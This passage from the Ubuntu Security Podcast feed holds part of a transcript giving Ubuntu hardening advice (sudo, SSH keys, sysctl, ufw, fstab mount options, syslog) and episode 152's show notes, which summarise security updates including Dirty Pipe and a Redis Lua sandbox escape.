harder for an attacker that happens to get a shell to type away in their
keyboards and, with no obstacles to hinder them, read the /etc/shadow file,
for example. Granted, if attackers have a password for a user that has all
&lsquo;sudo&rsquo; privileges set, this is the equivalent of being &lsquo;root&rsquo; on a
system. But you&rsquo;re better than that. You configured things in order to
avoid all power to be held by one single user and &lsquo;sudo&rsquo; allowed you to do
that. &lsquo;Root&rsquo; cannot be restricted in any way, while &lsquo;sudo&rsquo; users can, and
that is why using &lsquo;sudo&rsquo;, even if you can have pseudo-root users through
it, is a better call. And yes, I know it&rsquo;s not pronounced p-seudo&hellip;but if
I pronounced it correctly, as simply pseudo-root users&hellip;it would have been
kind of confusing. So sorry about the mispronunciation, but I had to get
that silent P across. Maybe it&rsquo;s intentional though, since a &lsquo;sudo&rsquo; user is
a pseudo-root user and a pseudo-root user or a pseudo-sudo user is the end
goal for an attacker hacking into a system. Guess how many times it took me
to record that? Anyway, getting back on topic here&hellip;just remember to
properly configure your &lsquo;sudoers&rsquo; file. More than just defining what a user
can and cannot run with &lsquo;sudo&rsquo;, you can also use &lsquo;sudo&rsquo; itself to configure
a secure path for users when they run commands through &lsquo;sudo&rsquo;. The
&lsquo;secure_path&rsquo; value can be set in the &lsquo;sudo&rsquo; configuration file, and then,
whenever a user runs a &lsquo;sudo&rsquo; command, only values set in this parameter
will be considered as being part of a user&rsquo;s regular &lsquo;PATH&rsquo; environment
variable. In this way, you are able to delimit an even more specific
working area for a user that is given &lsquo;sudo&rsquo; privileges. Be careful though,
and always edit the /etc/sudoers file with &lsquo;visudo&rsquo;, in order to avoid
getting locked out from your own system due to syntax errors when editing
this file. Do be bold, however, and go beyond the regular &lsquo;sudo&rsquo; usage,
where you create a new user that has all &lsquo;sudo&rsquo; privileges, and instead
correctly configure &lsquo;sudo&rsquo; for your users, groups and system! It might seem
like something simple, but it could make a huge difference in the long run.</p>
<p>So, in our Ubuntu OS here, step number one post installation to keep our
system safe is to create new users and assign them to appropriate groups,
which will have super user privileges and permissions set according to the
minimum necessary they need to run their tasks in the system. Remember:
when it comes to security, if it&rsquo;s not necessary, then don&rsquo;t include
it. Plus, as a final bonus to not having a root user configured, not having
a root password makes brute forcing the root account impossible. Well,
that&rsquo;s enough of using the word &lsquo;sudo&rsquo; for one podcast episode, am I right?
Let&rsquo;s jump into our next hardening measure and not use the word &lsquo;sudo&rsquo;
anymore. This was the last time! I promise. Sudo! Ok, ok, it&rsquo;s out of my
system now! Moving on!</p>
<p>So I hear you have your users properly set up in your system. You now want
to login to this system through the network, using one of the good old
remote shell programs. It is very likely this will be configured by you, so
let&rsquo;s talk about how we should set this up in a secure manner. For
starters, let&rsquo;s not ever, ever, EVER - pleaaaase…- use unencrypted remote
shells such as the ones provided by applications/protocols such as
Telnet. I mean&hellip;why? Just&hellip;why? Forget about Telnet, it has broken our
hearts far too much that we no longer can trust it. We know better than to
let data be sent through the network in clear text, right everyone? Ok,
that being said, SSH is our best and likely most used candidate here. There
is a package for it in the Ubuntu main component, meaning: it is receiving
support from the Canonical team, including the security team, which will
patch it whenever dangerous security vulnerabilities in the software show
up. Bonus points! Just installing SSH and using it will not be enough if we
are truly looking for a hardened system, so, after install, there are a few
configurations we must make, through the SSH configuration file, to
guarantee a more secure environment. Starting off with locking SSH access
for the &lsquo;root&rsquo; user. If you didn&rsquo;t enable &lsquo;root&rsquo; user password in your
system, then this is already applied by default in your Ubuntu OS, however,
it is always nice to have a backup plan and be 200% sure that external
users will not be able to remotely access your machine with the &lsquo;root&rsquo;
user. There could always be a blessed individual lurking around the corner
waiting to set &lsquo;root&rsquo; password because &ldquo;Sudo &lsquo;wasn&rsquo;t working&rsquo; when I needed
it to, so I just enabled root&rdquo;. Yeesh. In the SSH server configuration file
there is a variable &lsquo;PermitRootLogin&rsquo; which can be set to &rsquo;no&rsquo;, and then
you avoid the risk of having an attacker directly connect to your system
through the Internet with the most powerful user there is. Brute force
attacks targeting this user will also always fail, but you shouldn&rsquo;t worry
about that if you set strong passwords, right?  We also want to configure
our system to use SSH2 instead of SSH1, which is the protocol version which
is considered best from a security point of view. The SSH configuration
file can also be used to create lists for users with allowed access and
users with denied access. It&rsquo;s always easier to set up the allow list,
because it&rsquo;s easier to define what we want. Setting up a deny list by
itself could be dangerous, as new possibilities of what is considered
invalid may arise every second. That being said though, being safe and
setting up both is always good. You should define who is allowed to access
the system remotely if you plan on implementing a secure
server. Organization and maintenance is also part of the security process,
so defining such things will lead to a more secure environment. The same
can be done to IP addresses. It is possible to define in the SSH
configuration file which IP addresses are allowed to access a device
remotely. Other settings such as session timeout, the number of concurrent
SSH connections, and the allowed number of authentication attempts, can all
be set in the SSH configuration file as well. However, I will not dive into
details for those cases since more pressing matters must be discussed here:
disallow access through password authentication for your SSH server. Use
private keys instead. The private-public key system is used and has its use
suggested because it works, and it is an efficient way to identify and
authenticate a user trying to connect. However, do not treat this as a
panacea that will solve all of your problems, since, yes, using private
keys to connect through SSH is the better option, but it will not be if
implemented carelessly. It is well known that you can use private keys as a
login mechanism to avoid having to type passwords. Don&rsquo;t adopt SSH private
key login if that is your only reason for it. Set a private key login for a
more secure authentication process, and not because you might be too lazy
to type in your long and non-obvious password. Setup a private key with a
passphrase, because then there is an additional security layer enveloping
the authentication process that SSH will be performing. Generate private
keys securely, going for at least 2048 bit keys, and store them securely as
well. No use implementing this kind of authentication if you are going to
leave the private key file accessible to everyone, with &lsquo;777&rsquo; permissions
in your filesystem. Another important thing to note: correctly configure
the &lsquo;authorized_keys&rsquo; file in your server, such that it isn&rsquo;t writable by
any user accessing the system. The same goes for the ssh configuration
file. Authorized keys should be defined by the system administrator and SSH
configurations should only be changed by the system administrator, so
adjust your permissions in files that record this information accordingly.</p>
<p>Wow. That was a lot, and we aren&rsquo;t even getting started! Oh man! This is
exciting, and it goes to show that hardening a system is hard work. Pun
completely intended. It also goes to show that it requires
organization. This might be off-putting to most, but can we really give
ourselves the luxury of not caring about such configurations considering
that attackers nowadays are getting smarter and more resourceful? With all
the technology out there which allows us to automate processes, we should
be measuring up to sophisticated attackers, and doing the bare minimum
shouldn&rsquo;t even be a consideration, but instead a certainty. That&rsquo;s why we
are going beyond here and we are implementing kernel hardening measures as
well.</p>
<p>The &lsquo;sysctl&rsquo; command, present in the Ubuntu system, can be used to modify
and set kernel parameters without having to recompile the kernel and reboot
the machine. Such a useful tool, so why not take advantage of the ease
brought by it and harden your system kernel as well? With &lsquo;sysctl&rsquo; it is
possible to do things such as tell a device to ignore PING requests, which
can be used by an attacker during a reconnaissance operation. Sure, this is
not the most secure and groundbreaking measure of all time, however, there
are other things that can be set through &lsquo;sysctl&rsquo;, this was just an
introductory example, you impatient you! The reading of data in kernel logs
can be restricted to a certain set of users in order to avoid sensitive
information leaks that can be used against the kernel itself during
attacks, when you configure &lsquo;sysctl&rsquo; parameters to do so. So, there you go,
another example. It is also possible to increase entropy bits used in ASLR,
which increases its effectiveness. IP packet forwarding can be disabled for
devices that are not routers; reverse path filtering can be set in order to
make the system drop packets that wouldn&rsquo;t be sent out through the
interface they came in, common when we have spoofing attacks; Exec-Shield
protection and SYN flood protection, which can help prevent worm attacks
and DoS attacks, can also be set through &lsquo;sysctl&rsquo; parameters, as well as
logging of martian packets, packets that specify a source or destination
address that is reserved for special use by IANA and cannot be delivered by
a device. Therefore, directly through kernel parameter settings you have a
variety of options, that go beyond the ones mentioned here, of course, and
that will allow you to harden your system as soon as after you finish your
install.</p>
<p>So, we&rsquo;ve talked about the users, we&rsquo;ve talked about SSH, we&rsquo;ve talked
about the kernel, and we have yet to pronounce that word that is a cyber
security symbol, the icon, used in every presentation whenever we wish to
talk about secure systems or, by adding a huge X on top of it, breached
networks. The brick wall with the little flame in front of it. The one, the
only, the legendary and beloved firewall. No, firewalls are not the
solution to all security problems, but if it became such an important
symbol, one that carries the flag for cyber security measures most of the
time, it must be useful for something, right? Well, let me be the bearer of
good news and tell you that it is! Firewalls will help you filter your
network traffic, letting in only that which you allow and letting
out&hellip;only that which you allow. Amazing! If you have a server and you know
what ports this server will be using, which specific devices it will be
connecting to and which data it can retrieve from the Internet and from
whom, then, you can set up your firewall very efficiently. In Ubuntu, you
can use &lsquo;ufw&rsquo;, the Uncomplicated Firewall, to help you set up an efficient
host based firewall with &lsquo;iptables&rsquo;. &ldquo;Why would I need a host based
firewall if I have a firewall in my network, though?&rdquo;, you might ask. Well,
for starters, having a backup firewall to protect your host directly is one
more protection layer you can add to your device, so why NOT configure it?
Second of all, think about a host based firewall as serving the specific
needs of your host. You can set detailed rules according to the way the
device in question specifically works, whereas on a network based firewall,
rules might need to be a little more open and inclusive to all devices that
are a part of the network. Plus, you get to set rules that limit traffic
inside the perimeter that the network firewall limits, giving you an
increased radius of protection for the specific device we are considering
here. Another advantage, if the various mentioned here are not enough: if
your server is running on a virtual machine, then when this machine is
migrated, that firewall goes with it! Portability for the win! If you are
not convinced yet, I don&rsquo;t know what to say other than: have you seen the
amazing firewall logo? Putting that cute little representation of cyber
security in the host diagrams in your service organization files will
definitely bring you joy, guaranteed.</p>
<p>Next in configuring our still waiting to become a full-fledged server
system is &lsquo;fstab&rsquo;. The &lsquo;fstab&rsquo; file is a system configuration file in
Ubuntu which is used to define how disk partitions and other block devices
will be mounted into the system, meaning, defining where in the Linux
directory tree will these devices be accessible from when you are using the
operating system. Therefore, everytime you boot your computer, the device
which contains the data that you expect to use needs to be mounted into the
filesystem. &lsquo;Fstab&rsquo; does that for you during the boot process, and what is
even better: it allows you to set options for each partition that you will
mount, options that change how the system views and treats data in each of
these partitions. Remember eons ago when we were talking about disk
partitioning and I said there was more to it than just isolating /tmp from
everything? Well, the time has finally come to talk about it. So, even
though it&rsquo;s not Thursday let&rsquo;s go for the throwback and keep the /tmp
example alive shall we? If during install you separated your partitions and
put /tmp in its own separate area, you can use &lsquo;fstab&rsquo; when mounting the
partition that will be represented by the /tmp directory and set it as a
&rsquo;noexec&rsquo; partition. This is an option that tells the system that no
binaries in this partition are allowed to be executed. You couldn&rsquo;t have
done this if your entire system was structured to be under one single
partition, or else the entire partition would be non-executable, and then
you could not have a server running on that device. You could also go one
step further and make the partition read-only, although for /tmp that might
not be the best choice given the reason for its existence. Applying this to
another situation though, if you have a network shared directory with its
own partition, for example, it is possible to make this partition
read-only, and avoid consequences that might arise from having users over
the internet being able to write to it. Another suggestion: setting up the
/proc directory with the &lsquo;hidepid=2, gid=proc&rsquo; mount options as well as the
&rsquo;nosuid&rsquo;, &rsquo;noexec&rsquo; and &rsquo;nodev&rsquo; options. The /proc directory is a
pseudo-filesystem in Linux operating systems that will contain information
on running processes of the device. It is accessible to all users, meaning
information on processes running in the system can be accessed by all
users. We don&rsquo;t necessarily want all that juicy data about our processes to
be available out there for anyone to see, so setting the &lsquo;hidepid&rsquo; and
&lsquo;gid&rsquo; parameters to the previously mentioned values will make it that users
will only be able to get information on their own processes and not on all
processes running in the server, unless they are part of the &lsquo;proc&rsquo;
group. The &rsquo;noexec&rsquo;, &rsquo;nosuid&rsquo; and &rsquo;nodev&rsquo; options will make this part of
the filesystem non-executable, block the operation of &lsquo;suid&rsquo; and &lsquo;sgid&rsquo;
bits set in file permissions and ignore device files, respectively, in this
file system. So&hellip;more hardening for the partition. A simple one line
change in the /etc/fstab file that can make a very big difference when
considering the protection of your server. Though, once again, I stress
that all of these are possibilities and, considering our main example here,
if you do have software that requires execution /tmp, which is a
possibility when we consider that there are packages that execute files
from /tmp during install, please do not follow the suggestions here
directly, but instead adapt them to your environment and your
needs. Listener discretion is therefore advised.</p>
<p>Our last post install tip comes in the shape of a file&hellip;a file filled with
lines and more lines of information about your system. Use your logs! Take
care of your logs! Embrace your logs. Ignorance might be bliss in a lot of
situations, but when it comes to a computing device, going that extra mile
to understand it might be what saves you from the future robotic takeover a
lot of people are expecting to happen. Why? Because if you know the logs,
you know the system, what is happening, where are the issues! And then when
the robots conquer, you will be the one that knows how it feels, it&rsquo;s
innermost secrets. The connection you build with that single computer might
save the world from AI takeover. Victory through empathy. Ok, seriously
though, I continue dramatic as ever, but do not let my exaggeration stir
you away from the most important takeaway here. Most of the logging
information in an Ubuntu system will be found under the /var/log directory,
with logging being performed primarily by &lsquo;syslog&rsquo;. The &lsquo;syslog&rsquo; daemon
will generate all kinds of log files, from authorization logs, to kernel
logs to application logs. Apache, for example, has a log file entry under
/var/log, considering you have it installed in your system. You can
configure your device to use the syslog daemon to send log data to a syslog
server, which will centralize log data that can then be processed by
another application in a faster and more automated manner. Do remember to
transfer your logs through the network in a secure, preferably encrypted
fashion though, or else you are just leaving sensitive data about your
server and everything in it out there for the taking. That being said,
here, your configuration file of choice will be /etc/syslog.conf. In this
file, you will tell the &lsquo;syslog&rsquo; daemon what it should do with all that
data gold it&rsquo;s collecting from your system. You can set what is the minimum
severity level for messages that will be logged, as well as set what will
be done to these log messages once they are captured. These can be piped
into a program, for example, which can then process the message further and
take some kind of action based on the outcome, like sending the message via
e-mail to a desired mailbox, or, as previously mentioned, they can be sent
directly to a centralized server that will perform further analysis of the
information through another third party software. With the data and the
means to send it to a place where it can be properly processed, you have
all that is necessary to appropriately and securely understand what is
happening to your system. You can then follow up on issues quickly enough
whenever you have one that is a threat to your server&rsquo;s security. Reaction
measures are also a part of the hardening process, since we can have
situations where prevention is just not enough.</p>
<p>Billions of theoretical years have passed so far for our ever expanding and
evolving digital galaxy…and I am sure it actually feels like that after all
the talking I have done, but please bear with me for a little while
longer. Earth is finally ready to have its first living creature be born!
It is finally time to install the software needed to transform this, up
until this point, regular device, into a mighty Internet connected
server. It is time to get our applications running, our ports open, and our
data flowing. Let&rsquo;s do this securely, however, shall we? Wait. Not yet
though. Earth was able to wait a billion years, so you might just be able
to wait another week! I know. I am being mean. Anyway, not much I can do
about it now! Don&rsquo;t forget to share your thoughts with us on our social
media platforms and I will see you all next week for the grand finale! Bye!</p>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer-36-12">Ubuntu Security Engineer [36:12]</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a></li>
<li>Home based, worldwide</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E153.mp3" length="24720270" type="audio/mpeg" /><itunes:duration>2239</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 152
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-152/</link>
          <pubDate>Fri, 11 Mar 2022 14:19:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>7911dd66f88917a50ea3ec6c6515b11c8313f155c05f8b049f75620b3ffa149d0d74dfb503b868f08237916267a8eb0b65aca16b2855fcf17345ebdba5aeaacd</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 152</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's a big week for kernel security vulnerabilities - we cover Dirty Pipe
  and fixes for the latest microarchitectural side channel issues, plus we
  bring you the first in a 3 part series on hardening your Ubuntu systems
  against...
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's a big week for kernel security vulnerabilities - we cover Dirty Pipe
  and fixes for the latest microarchitectural side channel issues, plus we
  bring you the first in a 3 part series on hardening your Ubuntu systems
  against malicious attackers.
  </itunes:summary>
        <description>  It's a big week for kernel security vulnerabilities - we cover Dirty Pipe
  and fixes for the latest microarchitectural side channel issues, plus we
  bring you the first in a 3 part series on hardening your Ubuntu systems
  against malicious attackers.
  </description>
        <googleplay:description>  It's a big week for kernel security vulnerabilities - we cover Dirty Pipe
  and fixes for the latest microarchitectural side channel issues, plus we
  bring you the first in a 3 part series on hardening your Ubuntu systems
  against malicious attackers.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s a big week for kernel security vulnerabilities - we cover Dirty Pipe
and fixes for the latest microarchitectural side channel issues, plus we
bring you the first in a 3 part series on hardening your Ubuntu systems
against malicious attackers.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>34 unique CVEs addressed</p>
<h3 id="usn-5312-1-haproxy-vulnerability-00-46">[<a href="https://ubuntu.com/security/notices/USN-5312-1">USN-5312-1</a>] HAProxy vulnerability [00:46]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0711">CVE-2022-0711</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU based DoS via the <code>Set-Cookie2</code> header - obsolete HTTP response header
used to send cookies from the server to the user - possible infinite loop
when parsing responses which contained this header</li>
</ul>
<h3 id="usn-5300-2-usn-5300-3-php-vulnerabilities-01-24">[<a href="https://ubuntu.com/security/notices/USN-5300-2">USN-5300-2</a>, <a href="https://ubuntu.com/security/notices/USN-5300-3">USN-5300-3</a>] PHP vulnerabilities [01:24]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21707">CVE-2021-21707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9119">CVE-2017-9119</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9120">CVE-2017-9120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9118">CVE-2017-9118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8923">CVE-2017-8923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9253">CVE-2015-9253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-150/">Episode 150</a></li>
</ul>
<h3 id="usn-5311-1-containerd-vulnerability-01-41">[<a href="https://ubuntu.com/security/notices/USN-5311-1">USN-5311-1</a>] containerd vulnerability [01:41]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23648">CVE-2022-23648</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Able to access read-only copies of files from the host via specially
crafted container image</li>
</ul>
<h3 id="usn-5314-1-firefox-vulnerabilities-02-11">[<a href="https://ubuntu.com/security/notices/USN-5314-1">USN-5314-1</a>] Firefox vulnerabilities [02:11]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26486">CVE-2022-26486</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26485">CVE-2022-26485</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 critical impact (as defined by Mozilla) vulns - both UAFs</li>
<li>Mozilla reported seeing reports of both being exploited in the wild</li>
</ul>
<h3 id="usn-5313-1-openjdk-vulnerabilities-02-36">[<a href="https://ubuntu.com/security/notices/USN-5313-1">USN-5313-1</a>] OpenJDK vulnerabilities [02:36]</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21365">CVE-2022-21365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21366">CVE-2022-21366</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21360">CVE-2022-21360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21341">CVE-2022-21341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21340">CVE-2022-21340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21305">CVE-2022-21305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21299">CVE-2022-21299</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21296">CVE-2022-21296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21294">CVE-2022-21294</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21293">CVE-2022-21293</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21291">CVE-2022-21291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21283">CVE-2022-21283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21282">CVE-2022-21282</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21277">CVE-2022-21277</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21248">CVE-2022-21248</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Matthias Klose from the Ubuntu Foundations team for preparing
these updates - latest upstream point releases</li>
<li>17.0.2 + 11.0.14</li>
</ul>
<h3 id="usn-5310-2-gnu-c-library-vulnerabilities-02-56">[<a href="https://ubuntu.com/security/notices/USN-5310-2">USN-5310-2</a>] GNU C Library vulnerabilities [02:56]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23219">CVE-2022-23219</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23218">CVE-2022-23218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3999">CVE-2021-3999</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-151/">Episode 151</a> - this update is a subset of those</li>
</ul>
<h3 id="usn-5316-1-redis-vulnerability-03-09">[<a href="https://ubuntu.com/security/notices/USN-5316-1">USN-5316-1</a>] Redis vulnerability [03:09]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0543">CVE-2022-0543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Redis contains a scripting interface using Lua and implements a sandbox
for this to try and avoid scripts running arbitrary Lua code</li>
<li>Upstream has a vendored copy of lua but in Ubuntu + Debian the redis
package links against the system installed liblua
<ul>
<li>this is a good thing as it means that when say a vuln appears in Lua
itself we only have to patch Lua to fix other applications like redis
whereas otherwise we would also have to patch the embedded/vendored
copy of lua in redis and release a redis update for every Lua
vulnerability as well</li>
</ul>
</li>
<li>As such we also want it to use the system lua libs of cjson and bitop</li>
<li>Included a small custom piece of code to have it load those instead of
the ones that would usually be shipped in redis itself</li>
<li>Discovered that this shim code failed to set the <code>package</code> variable and as
such left this global variable uninitialised - an attacker with the
ability to execute a Lua script could then cause Lua to load the full
system liblua unsandboxed and hence then use this to execute other
arbitrary commands on the host</li>
<li>Note in general it doesn&rsquo;t look like upstream Redis consider the existing
sandbox to be a security boundary so recommend to only give trusted users
the permission to EVAL Lua in redis</li>
</ul>
<h3 id="usn-5317-1-linux-kernel-vulnerabilities-05-34">[<a href="https://ubuntu.com/security/notices/USN-5317-1">USN-5317-1</a>] Linux kernel vulnerabilities [05:34]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0002">CVE-2022-0002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0847">CVE-2022-0847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23960">CVE-2022-23960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25636">CVE-2022-25636</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Thadeu Cascardo from the kernel team for coordinating all the
work on these fixes</li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/DirtyPipe">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/DirtyPipe</a>
<ul>
<li><a href="https://dirtypipe.cm4all.com/">https://dirtypipe.cm4all.com/</a></li>
<li>Similar to &ldquo;Dirty Cow&rdquo; but easier to exploit - one of the more high
profile vulnerabilities in recent times - due to mishandling of the
page cache within the Linux kernel, a malicious process could abuse the
<code>pipe</code> and <code>splice</code> system calls to cause the kernel to overwrite contents
of arbitrary files even when a user had no write permission to the
particular file (even on immutable and RO-filesystems)</li>
<li>Very simple error due to the failure to initialize the flags element
within a pipe buffer when handling pipe data within the kernel - fix is
2 lines of code to initialise this to 0</li>
<li>Flaw exists back to 4.9 but this is thought only to be exploitable
since the 5.8 kernel which refactored this code</li>
<li>As such for now have patched for the 5.13 kernels in 21.10 + 20.04 LTS
but will also patch in the future during regular development cycle for
the older kernels like 5.4 in 20.04 LTS as well as an additional
hardening measure</li>
</ul>
</li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/BHI">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/BHI</a>
<ul>
<li>Latest set of hardware microarchitectural issues - in the same vein as
the original Spectre flaws from Jan 2018 (4 years ago!)</li>
<li>Set of vulnerabilities affecting both Intel and ARM processors which
can allow unprivileged user to leak (read) memory from kernel / other
applications</li>
<li>Requires the ability to execute a &ldquo;gadget&rdquo; in the kernel to do the
speculative execution - and the only way known to get one of these is
to inject it as BPF code</li>
<li>As a result this update also disabled unprivileged eBPF loading as well
to close off this attack vector</li>
</ul>
</li>
</ul>
<h3 id="usn-5318-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5318-1">USN-5318-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0002">CVE-2022-0002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23960">CVE-2022-23960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25636">CVE-2022-25636</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5319-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5319-1">USN-5319-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0002">CVE-2022-0002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="camila-discusses-ubuntu-hardening--part-1--10-20">Camila discusses Ubuntu hardening (part 1) [10:20]</h3>
<ul>
<li>In response to a topic on discourse.ubuntu.com re <a href="https://discourse.ubuntu.com/t/basic-security-advice-for-running-your-own-server/26786">Basic security advice
for running your own server</a> - Camila has prepared a 3 part series on
steps you can take to harden your Ubuntu machines against attack - part 1
focuses on hardening at install time, part 2 is post install steps and
part 3 looks at additional measures you can take once the machine is
deployed - today we bring you the first part in this series</li>
</ul>
<h4 id="transcript">Transcript</h4>
<p>Hello listener! Welcome to another episode of the Ubuntu Security Podcast
where I, Camila, will be talking to you all more about one subject or
another involving the Ubuntu Linux distribution and cyber security in
general. Today&rsquo;s episode is a response to a request. A request from someone
that wants to learn more about how it is possible to create an Ubuntu
system, which will be running some type of service, in a secure
manner. After all, we do live in times where threats that were only
physical have migrated to the digital world as well, so just having a
server set up with all ports open and no access control set is no longer an
option for those that wish to use the almighty Internet to provide some
type of service. Heck! The concern should exist even if you don&rsquo;t wish to
have an Internet facing server, but simply if you own a computer&hellip;or a
smartphone&hellip;or a smart TV&hellip;or a car. Or anything really. We are all
connected by our WiFis, whether we want it or not, so taking care of our
own digital perimeter has become something essential, and something that we
all should be applying to not get spammed nor scammed in the days of
today. So, since I do love me some lists, let&rsquo;s talk about, in a
chronological list format, what measures you can apply to your Ubuntu OS
and what tools can you use in this same OS to make it safer, hardened
against the cold and harsh wave of 0&rsquo;s and 1&rsquo;s that might be traveling out
there through fiber optics cables just waiting to hack into your system.</p>
<p>Let&rsquo;s start with the basics and talk about what can be done with the tools
that you already have when you have an Ubuntu Linux coming fresh out of the
bootable USB stick you used to format your computer. Actually, if we are
indeed doing this, let&rsquo;s do it for real: we will go back even further, and
talk about the basics that can be done not only after a fresh install, but
